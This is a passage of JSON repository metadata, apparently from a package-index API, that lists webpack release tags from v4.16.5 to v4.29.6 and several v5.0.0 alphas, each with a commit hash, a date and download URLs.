pendencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_i